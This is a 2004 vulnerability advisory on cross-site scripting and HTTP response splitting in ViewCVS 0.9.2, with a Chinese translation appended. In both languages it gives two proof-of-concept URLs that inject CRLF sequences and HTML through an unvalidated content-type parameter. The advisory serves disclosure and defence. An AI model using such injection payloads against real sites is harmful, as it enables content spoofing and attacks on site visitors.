信息来源：www.securityfocus.com

---------------------------------------------------------------------------
Two Vulnerabilities in ViewCVS
---------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2004
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ViewCVS 0.9.2 - ViewCVS is a browser interface for CVS and Subversion
version control repositories

ViewCVS can browse directories, change logs, and revisions of files. It
can display diffs between versions and show selections of files based on
tags or branches. In addition, ViewCVS has "annotation" / "blame"
support, and Bonsai-like query facility

Web : http://viewcvs.sourceforge.net

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Cross Site Scripting Vulnerability and/or HTTP Response Splitting

A1. When you want to view any source file that is stored in the CVS
repository you can
select the mime-type to view this (in example, text/html or text/plain).
This is a
parameter that receives thet viewcvs.py script and is not verified.

I'm not sure if this is an HTTP Response Splitting vulnerability and/or
a Cross Site Scripting,
but is a security problem.

To try the vulnerabilities you can try the following the Proof of
Concepts:

Sample 1 :
~~~~~~~~~~


http://<site-with-viewcvs-092 ... v=HEAD&content-
type=text/html%0d%0a%0d%0a<html><body%20bgcolor="black"><font%20size=7%20color=red>XSS%20or%20HTTP%20Response%20Splitting</font></html>

Sample 2 :
~~~~~~~~~~


http://<site-with-viewcvs-092>/cgi-bin/viewcvs/*checkout*/project/source.file?rev=1.0&content-
type=text/html%0d%0aContent-Length:1937%0d%0a%0d%0aHi


The fix:
~~~~~~~~

The vendor was contacted but no path for the 0.9.2 version has been
released. Anyway, the
problems has been fixed in the ViewCVS 1.0-dev version available via
CVS.

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is
provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.

---------------------------------------------------------------------------

Contact:
~~~~~~~~

Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

翻译网站：http://www.bnso.net
Bug.Center.Team 翻译小组

Two Vulnerabilities in ViewCVS
安全通告：<1104609524.17665.4.camel () nemobox>
发布日期：2005-01-01 20:03:05
漏洞发布：Jose Antonio Coret (Joxean Koret)
影响软件：ViewCVS 0.9.2
软件描述：ViewCVS是一个被CVS和Subversion版本用来控制库的浏览器接口软件。
ViewCVS能浏览目录，改变日志，修正文件。它能显示各种版本与显示基于标签或者分部的选择的文件的不同。
另外，ViewCVS还支持"annotation" / "blame"，并且支持Bonsai-like 咨询设备。
站点：http://viewcvs.sourceforge.net

--------------------------------------------------------------------------
漏洞描述：跨站脚本漏洞  HTTP回显漏洞
当你查看任何存放在CVS库中的源文件时，你可以选择mime类型去看文件（例如，text/html or text/plain）
这是一个接收viewcvs.py脚本的参数没有被确认。  .
我不确定这个是一个HTTP 回显漏洞还是跨站脚本攻击漏洞，但是这一定是一个安全问题。
你可以用以下例子去测试这个漏洞：
例子1：
http://<site-with-viewcvs-092 ... HEAD&content-ty \
pe=text/html%0d%0a%0d%0a<html><body%20bgcolor="black"><font%20size=7%20color=red>XSS%2 \
0or%20HTTP%20Response%20Splitting</font></html>
例子2：
http://<site-with-viewcvs-092>/cgi-bin/viewcvs/*checkout*/project/source.file?rev=1.0& \
content-type=text/html%0d%0aContent-Length:1937%0d%0a%0d%0aHi

修补方法：
厂商已经知道，但是目前还没有0.9.2版本的补丁
其他方法：升级到ViewCVS 1.0-dev version